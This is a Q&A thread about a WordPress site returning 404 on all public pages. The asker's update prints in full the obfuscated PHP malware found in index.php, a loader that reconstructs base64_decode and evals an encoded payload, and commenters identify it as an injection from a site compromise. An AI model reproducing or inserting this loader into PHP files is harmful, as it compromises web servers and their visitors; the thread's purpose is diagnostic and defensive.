# WordPress 404 front page and all pages, even after permanlinks reset

Tags: php, wordpress, http-status-code-404

I had a WordPress site that was working today. The wp-admin section was not working. I renamed the plugins folder. That did not help. So I deleted the .htaccess file in wp-admin. This fixed the problem for wp-admin, which is now working.

I then restored the plugins folder.

However, the public part of the site was suddenly broken:

http://www.smashcompany.com/

http://www.smashcompany.com/technology/object-oriented-programming-is-an-expensive-disaster-which-must-end

There are 3 things that are often recommended for this problem:

- deactivate plugins
- restore the .htaccess file
- rebuild the permalinks

I did all 3 of these but I am still getting 404 on all public pages.

There are no useful error messages that I can find in the log file. Just 404 on every request.

Can anyone suggest other fixes?

On the same server I have a WordPress site that works fine:

http://www.weneedpatientadvocates.com/

Therefore I don't think this can be a problem with global Apache settings.

I'm thinking it has to have something to do with plugins, but I've deactivated and then reactivated them, three times now, without getting any improvement.

Reading here:

https://themeisle.com/blog/wordpress-error-log-debug/

I added this to wp-config.php:

```
define (WP_DEBUG , true);
define (WP_DEBUG_DISPLAY , true);
@ini_set('display_errors', 1);
```

But I still can't get any errors to display.

I added this to the top of wp-config.php:

```
echo "hi";
```

This does not appear. So the problem is before that.

### Update

Okay, I fixed this. In the top level index.php, I removed this:

```
$O00OO0='n1zb/ma5\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j';$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0ibklrd3hKcExGUWhWV3lybXNNS0JlakVvWVVHaUFSdGxkZlpEVFNiZ2NQYUhPWHp2cUNOdWJucEpGSVNDTGRrR052UmFxenV4Y01BRU9vdFlVbHJtRFhqZkJ5V2VLWndUVlFIaGdzUGlaZjlKd1RVZWpiR2lPM2xTVzI0ZUR0RDFXTExsdXNsaHkza09CeXB1Y3ZVdUl0OUNjTGtQWk5ENndONWFXdEwwanlrWU9RUG1QTWxYanRHTVcybG11c2xoeTNrT0J5cFNWSkVlamE5dnVzbFNaQlU3SXRwOEszbHZXdEdpdXNsaHkza09CeXA3SXRwUnV2cHVuVHF1SXQ5Q2NMa1BOdmxTUXlVOW50UEVLWWtoS2FkRUl0OUNjTGtQTnZsU1F5cHJ6eXA3c1l4OXNZeHZqUWwxS2E0ZUl0OUNjTGtQVkpFZVhORzJPTkpFRHREMVdMTGx1c0kyR2JkM2pmbTJsMkZhVkFBUndMTG9vYVBNakhMNW9wcDRkMkZ3R2FrNGxieHJvTmR2UG9TQ0dHa3RvSElNbDBJQmxObWZkcElJVzBMdEtMUGpLc3JvVm9sU0RmREJvTUxtd2FMNE9CbXBqUWU1RE4xQk9ibHVQMDB2emFTRUJCUDZOYVB5eTJqckRZOWx3Qm1wRDFTMmowcDR3MklhY29rU05hMDFWUVNwekhEckRhMUF3b0lmVkE0aHlRbUlEQXJCY0FqVnptR0pEMWxZV1F4VE5UR1NLTlNsR2FwSksxSXp3QkwzY0dHcm8zbXdsQTl2VkJEMWptVTJQSERGem14aURmQVJETVBkelFQd1ZvT3Z3TGtxTnRJaWpRbEVvM2x1R2J4Q0dRRFlsMEZaQk1PNURvSTJjWXEzVk5kaGphTHVQdFBkejNvSGpORzJjYnpGV2ZwNWQwMXNCYm1wV1RQZk5ianFWQTFGamZEMHoxeElLMVA1TkdEU2wyTFB3Qmp3V3RrQ09Ca1p3ZkR2Y01tYVZmbTFqYU8zSzJLNURva0FjZnB2S016aE92cm16Qkxpem1MVmN0bHlHYUxHdTJyMnkxbWl6Tk8yR2ZtM1BZOW1CbWQxVk5yZGwzZTFQb2t5S0xuRncyRnNCTlBHemJTTEsyclJqR0RQbE5sYW90bUp3UUtGTnBQZGRhNWtLbWpxd3BtZkJmR3NkM2xSZEdEVnlRalBPUW9GRzBBMW9wbDVqR0lwRzBMeFZMZXZOTjk2Y2FyM1BvMWJvYURoekJMbHpiZDJEMVU0d0J4ZnpObE5kMWpsY0xwNG9ObEhjR0xhVm9EUUdMRDJsbUdQajFvdm9vUEF6cG5Gd0JuRmRHUE5sYkdubGZLaEt5OTFWVGpBUEhwMnpteGl5QWpCS29rWUsyRFlOTkZaY0JqSkswU3pLQTVaelFTYVdzcmlOYUxHS0xEek8yU0ZqTEdObEE1ZFdMbGtCbzUxS0dTWUtMUDVEbWpWbExJNkJMbW1sMjlHbDA1dkdONEpPbUlUd3Bta3VIeFZsR0kxRzBtcE50RjRCTjVDbzNtMGNNbFJEbWxQUGFsdnpOR3JOYW1nanY5MFAwSWpLbW1nR2ZMWVd0Rm1jbWpnS3QxR2RvbTNHbW02R01HalBObGpHbWptTlFvdnlvMWJQYmtvd0ExdmN5ckZOTW1keXAwMHoyU1NPbXh1Y3A1SG8zR0lETEl1b21HVk5vS0p5MUd5QnRTbXpvbXpvM2pKbG9QUkRmeHhLQUVKQkJHTlBMTHpCb0dwb05TbVdMZEhDM1BNeXRkNVZmb1JvTFBwY2FTTXowbDFQTlBaT2FFUkRHeDJXR0Q1QjFrd2pMREd3TklJakdqSldReFF5QXEyeTJHUmxmbVBOTEdFR0dTc2RiR0FOQUc2ek40aERvblJWeXJ2UDAxQUJNbzFqUUR3enQ1YVBNZTFXcG8yV1FqaUJRa21CMFMyV0E1RlBhMW1QcHo0ZDI1bUJ0MWh1SEcyb1RvM092clBvc3JSY2JHcFBiS2h6YTRoUDJlMHkwOEhXb2tKZGJHZHcwRGtEczlyZEdVRkJRR3F5cEZMeTJKRkdtbzBEM0xFb0dJbEIwcmJkQmtqeTBQdE5NamhQTnAyV3BJM1cxRFpqYmwyejJvUnUwRkpQSE8xQk5qQ2p0bExLcGo0RHBJdWwxTEdHMjVqbzJFaFZmbU5WZk9GY01tcW8zVTRDSElRQzBuME5vTFlHMUtSekhqSmoyOVRObzkxb29yZktBUEJPSHhBQmFGRmwzcEhkMklOS0dEYXdRbW96THB2RFRHdktta09sYW92S0FGUUJiSU55MEVIVm9TVm8zU1Z3SFAwQmZ4NnlOTEVETGtHd1R6MkcyNXhvR2U1V0JqUEdBSWRsTmxib21QbE5iTDNXZkQ2ajFsYk9IajRvMkxrV0dtZEczUFNQTUdRQmJTeXozbGt6Qm5KQzBvSEIzTHdvTmtCS281VnkwNVN5QkdtTmFGMGQxbFlsTFNNdzNwMURUbUlXYUR4V2E1ZldtU2ZXMVN0QkhJTmxOR0djdGtseXM5bGowMWh6dGx4eXQxNXdta1Z3YXpGbFFtendhbVBCMHJSR0FHblcxRUpvcDVuakFtR0IxRE5scGt5UDFMdEJMR3FvTVBmZGJHdXlwa2tsVGt4RGJsSndibHhXZklrRHBsTkJOTHNCZklTT0JJa2QzSWJCTUlkR05tWU5BSUNHbzEzR0JEc0RwREp5WXJJQkJEcWx0ekhEb2U0UFlyTU9RU2dDMGt5TmJwdmNiRE9WbzF0RGJsSkRCR1NHb21QQjJEc1dvU3hqUVBpeUhVSEIxanh6czlsd01EcWpRRFJ6MEdnalRqNlBvTHVjYUdBam1vME9iU2RqMWQwR01EMGpHbHVEMGtKam1tQkIwTGdCQmtoRzNMdkdOckZsMmwwRFRMU08xT3Z5QVNiVkFyNm8xbXZDMVB6RE14dHdNalFDMXowT0JrdkRRZTJ6M2poT0hEaWRiSzFscFNQZEhMNUcwTGFqMDB2alRrMXkwbVlPcGszd0xsWmNUUFp5dExSVzA1YndiRFJWTGtTV29kSHdUbFRscG1tY29scVd0RFJXYm1oTmF6RmN0OWJQbzkweTJBRnptanpsdDE0eWJ4cWNRTG1sZnhtejNHZmxMRHVEUWwwam1rUGpMZDRObzAwbG9sTVdHUG55TEx1ak1rT1BtU3ZEQkxubzFMVHpISXVXUVBQdTFtTnp2OU5ETmp3V2ZwNEJwa3N6c3IyakE4M2pUUHFHM3hsamJtakRMT0pCdER6ajFqR2NhSUJXMDFyRzJsamNNa3NWdEdvS0xqVkJMbXJOVGtBQjBLMU9Hak9HYWxoUG1JZ0JhejFjTkc1QzBsaVd0UEZXeTlmRE5QSUdMUG95MVNieTJscWxvODRsTW0yY1FtSkJ0SXFvb0lJZDNEM05ta2p5MjlDV3BTbFZ0TGd3YTVKdzJEb0twUFR6b0RiV2FJSE5OU2dHMUdxQzFQYmpvbGhDMlNNTnBMeFZCTFpHcEUyS0hqUGoycnpsdHJ5Qk5HSXpwcDJWQWw1ZEdtbUJCbFZsTWpiV0hrcEdiSWFQQVBnR2ZqbmxmS0hXdEd4T0JEeVBmR2l5MG5GV01LNHdwMXBjR3hCeUxkUmRwbDRqdEYzekxMMnlMSU9QZkRmd0dJUXUwTFpHb0lxQk5Ta1AxR3dETHhnVzNtTWRvbHpkMkRMZDBJeHowbENXbUkxek5scEcybGl3ZkRtRHRJYXkyTEhOcEc0UExMZ09hRlBjbzBITmE1dVZ0a1p3cHJMeWJEUVd0RElCdG1nT1FwRmwxU2pOTWxPb05tNWNwR0NPQmx3T3BTSWNBR0dQbW8yR1RVNERmUGx3dHJZZDAxYWNMSVpDMHJkZDJTQnlOR1RsZm52RDBtZ05mbjVPbW1xelFJUWpvSTFCTFUxY3Q5RW8ybHV6TGtaQkEwMk8walNEUU9SeUhJUFBiSzNOcGpkTlk5RmQwUDNvMEloR3RGNURtanFjUWpOR21qaHpBRm5CR2tSSzJGYkcyNWFOYUlhR2JrYUd0UHNvQWpTbG9HbVdBRENLQUl6V2Z4Z08wR1psSHh0d3RQTU5wSmh3QnhyeUhMNHcyREN3TGs0eVFMaHd0cndXQUFKQnNycmxta1B3bVNreW9Qb3dNVTJQbzFuek1JeFdMVTJHTHhHbExsR05hbG1LSHhJRG9tQkJibEx5MGQzRGZrMmoyMDVXb0pGV05rMmNCbDZEb0RWZEJwMUJOOTN3SEE0d2FTM1Bha0NXQmxoRzJyWURhbTNCbURiV2JQTmpNbEh3QlBRd0xtdm8yckpLVERsY3RsaVBvMTRHbUlKZHA1UnpwbHNETUROS01Ja1dHeFNqSG1UdzJqTFcwbXNWdDF6V1Rsa2wzbUhCMkZFQnA5Ykt0R25sbUlUeUJ4T08ya3JvMUdkT28wSmpHZGhPSEQ1RG1Jd3dITDRkQmw2eTNTWnUxa0lvTjhSamJJUXdwOTZ5Qk81ZHBMdnlORGl6bUdIR0xqZEJwbG55MlBIeW9EckIwbjNjb3pKelFqTWpOOWtqSG1sVkxJbUtBTEl3TjkwUEhsc2xwOTVsQUxWb01MU0RwSjJOcG1nQlFuRkdBOXpvM1NHb2FqcXkzR0J5bzlJS0JHT09HUGlHb0lCRHlydFBObHF5SExvREJudktURzFCUVN0ank5NWQyU0d6dFN5Y2JJRktOMW9CVElnb01EZ1ZMeHlLSEQ0Tm1MMUdIbWdqYkc0V0xTQ0dvU1pQYmp1UExqWU92cmFOeTlaVk5qbVBNcDNWZm1hUDFsNEQybGRQSFBHak5qaXozS1JjeTkzUDNQa0czTG1WTmxFV2JsWWRvRmhsb0wyT0dBNHlBbzF5cDlFbEd6MXlITDVHSGxORFRVSE8xbGF6Mkd3S05sMFdhU2xPYmtsZG9BNWphOTBqbW1kS2FQTndUU3RETmtadzFMM08zRFZXcFN6R045TGxIUEZQR2tMUExJNVBBQTV6TmU0d0h4cEIyRHNWUW12T2FrcVZmamhCb0lKanBlNWNNUDNsVFNpT285MmxRbWpPMDRKb3BvM3dwOUdXQUZMeTFrU3dOb0ZEVFBham8xMVdmbEN3b2t0eUxMYmRiSTBLM3gyY1RreXoyTzJHdDlJRG1MNFBObDFqQUs1dUhkSGpvSVN3SExhQ3Y4aENIUHBQM3pGeUFuNWpRR3BEQm9ob0JPNERMeDZLTWQwbG14aHoxVWhEQlBIbDBrMFAzb2hqeXJFakdHYmRvNU1jQmt4bEhrWWpMa1F5TUk0V21sancwTGxqTmpvdzNPMmoxUFBCcDFrekJEdWx2cWh3TElUajNHcmxUU2JvTW1JZEJtR2NwMEZsTlNJeU5sZ0syRmpjUVNzakJvdkQzTHdCTHh3V0FTZmxzODFCTW1nY2FEUEJCeE9OYktGUExMMGQwTGxjQTVyb0FqeUMwMWJ5Tm9odTJMSmNNZFJPWXJSY2FPSFdZOTVXZmVoV1FsYlZzOFJETFVodzNtNEdUeGFEYTFiank5cE9CcDVXdjlaV3RQYXlMZTF6SEk2VkJkNEIyam5kWTg1Y3BlSk9NUGlQSE8xQ3Y5T0dZOVFDM2pQd1RqWWpRa0JkMGR2VkdMSkJMbTBQYVN4d29Hb1BIRFlCYklBSzBsd3l0NVROVGxoR2FTb2NUbDJHMkZTb2E5T0IzU0hOQkF2TkFFNVBNa1JkTUw0S3Zya1dHZTFXSEdRTmExcEIzU0dDMmRoS3Awdk5Ha3RLTEU1R2FKdkszSXpQeTgzdTJMSEMySjVPYkxBTnRKNU5CTGROTUl0T05JekdCemh3TER0T0JEaktIRDF6M0cyZE1VMXkyRGZCcHJwS0FHQWx0bG5HR2pwd2FMa0JzOWRHYUk0eTNFMkdteHNXQWpNdzBHZldmR3Vsb2tCS0dPNHdOa0JvMG1sZGFQQU55OUpHQURpS29yMERvTG5qTGxSS0FxNEQxTGxkM2xRb0dVRkIwRk9OTWpoTkFTaUswOXZsTW1BdTJEQW8wTEVCUWwzajNtZ1cwU2tQYWo1S21TYndBNUpObVNvT0dqQnpCRGhsSG4yemFyTkJvMUNjVHgzajFtRWx0cnZ3R0E0dUhrakJBODJ1dnEybFRFUkN2OUZvTHhSR0FrMnowUzNOTXh2V2FqMnowOFJ1djlwQzBsME9iUzJ6SFAxY3RHMkd0MGhCcEl1TlRJbGNMU0ZqbVBoR05tSXoxazZWbzVwakFyMkJRSVJPMGxIS2JLMmowbWlWQURzenQ5Z1BBZUZESE9SS3RHWnlIZDNvTjVpV1R4TUthOUd6Qkl4RGFQNGNBUHZHYUdhRzIxaERwRjV5TkRrT3Y4MEJBa1B6SGtTTmFycFZ0ajNEYTVhT05qMkJhZDFWeXFIRG84MVZUa0V1MjFxRGZtdEtCR1FPM0lxRzFvNFBBMDJvdGsyb0dEWmRhNHZQQW1nb3RMeHlBOFJkbU8yeXBrdGNmeEFOYUY1ZGFkMEJtU29EMEYwdTJTM1dBMXBLTXhzQnQ1dVBiSXpCbWxmZEh4ZkdOTGxHVGs1VnNydFdva0ZOb0U0ZE5QMkQxUE95UWx3bzNTSnphR2FHYmtPekFGZE5BU3d3cGxTem96MUtHajBQMW15dTJJcm9tamlsYWtNRzByZ0JIQVJOR28xTzFlMEtmalRDMDhIeW80MGozR21HQWtxQkhtSUtIbDFHYno1Qm1PSlZHRG9Eb1NvY29GUEdNUHdjR1BwemE0UnlhRFJETmtRdTFqc0twR25LYm5oakh4Q0tBMXdvMlBzd29JM1dhbGt6QTUwdzFsUHlteGpPMXh3S28wSHlvQTRQQktIb3REMld0R2J6MXhaeWFMVE9IZDBOTFB1RzBHZmpNa2tHTHhQVzBMTHkzbGdvM0dvZDNreU5NRzV3dDFhd3BtNUROREd6TUltVkJwRm9wOEpCQVNnREFuaGNZOXJHSFByek5QaU9Ra053QURpR2ZvMksyOUpOYVNPemZEeW9ORFREYmpOY2JuSkNIUGZ6bVAwVkFsZ050MVpHVG52V2JsTmpHT0ZvbWo1d0xkMUJBR3JPMW92ZFFudndwa3VvTjh2R05HVGwxUGlsYno0R2JtaHczbVlvM0dGQzBwMWpOb3Z6TG1yRzBxUkdBcmFCZkdubEJqTkJITEh6b1BhS1FQRnptbFpPYXFSS2FMUXlwbFpPYWswT0dHUHpMRHNjWTlDUE5Qdk9wTGZWTnE0RzFTWUcwU0dCM2V2T2JtMEQyRnJkTno0d2FlSEJUTGpWZmoyTnAxMk9hejF6b2xyd2JBUldRanB6R2prTzN4a2xIR21OUVMzT29rM3dtS0pETXAyV29ERWNvOWF5dDQxd3BMZ1dOMXdWQm10R0ExMUMxRG93dG9oeVFsTk9wSUJ5ZkdqRG1qWmxvRmxQMEZ3b0dqRk9tVUZETFNPeTIxcXlBSkpCUW1qemZHU1BhTEhXQTA1RFRERlcwOW1QUVVIemZ4QU5ReEd5YXJ1RFlyVm9RU2xESGpTRDJHQ1AzZEZHMkxwQjF4U05ONWRvSGtJT2FQSHlNb0hXMkRJbEdrNURva0F3MVBQR0FrSUROalJqMHFSUEdlMkJNbEN1MU8yQkFGMW9MSzBPR080RzBGUFBMbDZXMVNBVkJVMGpvREp5b1NTQmZJb0RIRHh6TERuQjFVNHpia1lQMUl4alF4TEMwalJjVERzUDByWmxmR21sSEx0T3BvSnpvRlBEVERqd3BrNk8xR0hvQmtJZGJQT1BMRzRvdEx2ZFFsa2ROTFJkcGtRb1RJem8yclN6MExGV3Rsd0dOMWxEYmt6V1RHQnpHbGtvdHJ5QzBQUVBHa3NvVEdpS3RsR0tISWdXb2t5bDJlMUMwU1l6YXEzTzJtVHowR1NDM2xualRQUUt0akZXUVN6TmZwNEcyS1JjTUlkV21qdk9hcml6b08wY01rNkdBa0p5dDhSUDJqWXdUZVJPM0lOY1lxRm9MelJqbzVhVkJLNVBIeG56M0loR0htbmxURzZHbXhGUEhHSk9IRHBvTVBBbE5sYnpRUFlQcEkwZDFwME5RbHJOVHpIalRTaXV2cjR6Tkd0REFyZ09OSW9LdG01T2EwMUtOR29XdnEyUEhreURMeEZEM3BIb0JrU0RiSVNjWThoR0JMb2NwSjNPYXFSY21MZmRtbkZjbWxOS05QSW8zSXZ1MDFxdzNJaXUxajR3ZmxnY3k5UXczeGROQWpnQmJEaUMzRGdsZm1ub01MUGxORFpqYTlubzJyRWRIRHVHYUZOVzJJUFd0bVpXQUd2eVFLMU8wckhCTERSV2Fsd2xOck1WTGpTY2ZHNURHa2Zqb09IeXBqc3pNeDNPUUlyZEJtemxBakl5MlNwZG8xbGowckhXM0l3eUx4aXUxU0lvVFBDakdHbEJOMU95QVB0TnBtNFBibGRkM2trem1wNUdIRGhsQklkd1FTa0RvbjVEVGp4amFMNEJBSWhsQnoyenRteWROTFFkMDlPY2JEVncwOW9PMW12UEF6Sm8wMWhvUWpRTlFqNm9UUzNXR3hSajFTZ1BwbXJvbzlSTkFqTGRRU1ZHYVAxd3RrNGNva2dLMGtJeXBMZEsyOTRqbWx2Qm1tUmowazFvM21mTk1rTFBieG1jdEQ2bDNEbU9HbVRHR21PS3A1eGQxU3BCM2pCajNETHlCalZ6YkRMemFHMldvSWpsM1V2bEhQaW9ORTBXQWpWZG81ZkRvMTROTmxsbFRHTmRwUG13YkdQV3BqamxvNTVqdEswQjJqc0RURHZsYkRZVzFMQncyRHpLQUczTkxrZ0IwclFvR0l5d0xMUkRIUGdkTUl4UHBMU2QwbG1vYXpIbGJ4TVBwbW5PYUszRDJQSG9manNkbzlBTnRQQ290NU1Eb09obEJQSU5RbXp5YlVKREFudmQwR0hXb3poY3Nyd2NOU3dXTm1HVlRsdEswU21HQW5KTkFyZkJvRjZ6QmtxV05ycHpwand5SGxGT3BGUW9Mb3ZvMjlKbFRvRnpCSW95Ym0xR1F4NHpNTHRWTGxWUDBPRm9vU2JsVHA0UDBqYk9wamJ3bzAzT21JT3dhbGZ5YUQ0bDBsVGxvNXpQb0RURFFHQ09CeFZLTHhCRDJEbEdCRzN5cDUwRHRJc1dHeEpvUWtFbzBTaGRtR1BjQTUzd1FqUUIxU3lCQW1ZV281Wnkza2xCTmtmV3BlMVAyOWJXMG52Qm9TTHlBSzBLZlBIVkJqanltbU1XdEl1bDFqQ0JHbExCTkloT05JTHkyU01qb2pUZEd4aWxRbGdXTkx6ak45UWoxVTFsTjFsREFsZnpUSVJkbzBGY29QaEdvSXdXM2trR0ExU09tTExsb0Zrb2ZEcUszTEFsb0wwTmE5TG9wUENLR2tPZDNvMWQxbUNvTnBIbzNrU290ak9LSGtieW9FM0dHSXREYkdibG9GZ1AwZVJkMm1tTkxrRkt2cUZHYnhHVm81SVBvOXlvSGtIUFRsUEczalRLTExoR1Rrb1BwbTZ1MkdmQlF4a29NUEVsMVBWT29yaFdvRHZ5QTFNb0FHWXdNUDRLM3hZbDJyamptVXZPR0VIV05TaURIVUZjcEE1d2FxSkdHSVl6M2xPeU1qZEJCanZQVGxmZHBsWXcyREZQR2xIT2FsVkRORTRqYmo0b3AxaGpwejB1Mks0TnRFMGNhTFBLMmt3VmZuaHlvR29vTmpzV29JYnlzOWRCQW80bExtTGRiTHN6MG1oemZMaFdNanlLM0RQREFQWktMU1BvWThKd1FrNWwyRm16THA1QmExZFdvTDRDMms0TkJrRnUwMU9OdGtteWJPM3dwbFF6VGpheVk5UHliRGd6djlUSzJHZE50R0JQUVBtam1TWW9tU3VkYURIbHRqM1dBbTNvYkcwTm9QTEQzbWdQcElUbEJMNEMwbjBETkRaamFEZmpNa0ZqMGQwelRTeU9ianRscElsakdMT0ROUDRLM2RSY281VERwTzFqQm4xQk5MQW9vOTJQb0xDRGExSnpvUHNQdDVnb0hvSGpIQXZ6eXJmak4xT2pvcUhkR3p2S3M5T05HUGx5MVBCeUdET2x0OW1QbXhiREFrQm9vam1HQUltS1RrTEJ0cmtsTGp5ajBtVnUyOU5QMVNNRG9JbE5wNU9Ob0dDREx4TVBMalFQdGpwRGE0RldUbG9LMXhNUE1udlBIbEJOR3hZSzFQM2xBSzNsVGxaeXRqYlBRUEZjQklBT01VSHpHbXN3dEZQQmZtR0IybDVWQWUzZFk4aE8zcEh3MmozbHQ1MVBmakhPeTlhbFFJZ1dma0NLSGtuR3k5c1dIbWpjTm9oVzNqTlAyOEpkM2pyUG1Tck5ibXF5cDVkbEE4NUJvRk1jR3h5amZHSFBBOWZQdEkyQkhtRUtvbVZ5cFBPRGJJaktIbW5qMFNrekE0MUJZOEh1MDk0d0xrT3p0bU5sM2R2bzI1dVcyR2x3b3JIQnNxUm90RjBqMEZyS0hETm9mUHdEYWpFUE1sRWphcEhQcDV0UHZyeXpiSTVHM3hxRHRGQ0RMakxCTkxneU5yNlBCajFqMmxwV0dMZ2pObXpsUWtwV2FQU29CbjNsM1NUb1RJbldtRzJvb0ZseWFHaEdUa3lQbUxuem96Sm8xR2tsb3BSakJQZHpwekpLR2tGbE1HUkRCeG1sVERwbE4xblcxa0xsQWpqY2ZwMFcxT2hkTks5WnluU3VCcS9aZT09IjsgIAogICAgICAgIGV2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksICAgIAogICAgICAgICRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
```

What is that craziness?

Why would it break my blog?

Comment: Regarding your update, that is almost certainly malware, hidden in obfuscated PHP code. Someone used a security vulnerability to run remote code on your server, and until that gap is plugged, someone can continue to take control in this fashion. Mostly they will use it to serve spammy ads at your users, but be particularly concerned if you handle personal data or payment card information.

Comment: This is a new install of Wordpress. I'm disappointed to think they still have security flaws. Wordpress used to be notorious for security problems, and then at some point they made a loud effort to focus on that problem, and I think they improved a bit, but perhaps they've slid backwards. It's disappointing. I'm looking for some other blog platform.

Comment: I wouldn't be so quick to blame WordPress. It may be a plugin or a theme that you have installed. Security flaws do occur in the platform - it has a lot of legacy architecture to contend with, it can't be redesigned quickly as it would destroy the ecosystem, and meanwhile it powers some 20% of the web, so we can be sure there is a disproportionate number of people trying to crack it.

Comment: My approach in WordPress is to run it in Docker and do the upgrades in Docker. Thus if there are any security issues, I can roll back to a trusted image. (I could do better with database backups to be honest - if I were to get hacked I would not have a "last week" copy to roll back to). So if your CMS is a critical project, I'd advocate isolating the code on your server, and ensuring you have a solid backup strategy. This goes for any CMS software - don't lower your guard if you switch to something else.

Answer (score 1, accepted):

Have you tried to deactivate all plugins, **rename the plugin folder** and try to access the site. If that works then the issue is one of the plugins. Activate one plugin and test, activate the next one and test and so on ... until you find the culprit.

If that does not work, then there could be change made to your .htaccess files.
Take a look at the modified date on your .htaccess files. Maybe a plugin made some  changes the .htaccess files.

You may also try to replace the .htaccess file with  fresh .htaccess files taken from the wordpress source code.

Comment: Yes, I renamed the plugins folder.

Answer (score 0):

I ran into this problem when changing the main query through `pre_get_posts` in **functions.php**. Same as @winteck recommends disabling plugins:

Try the theme with empty **functions.php**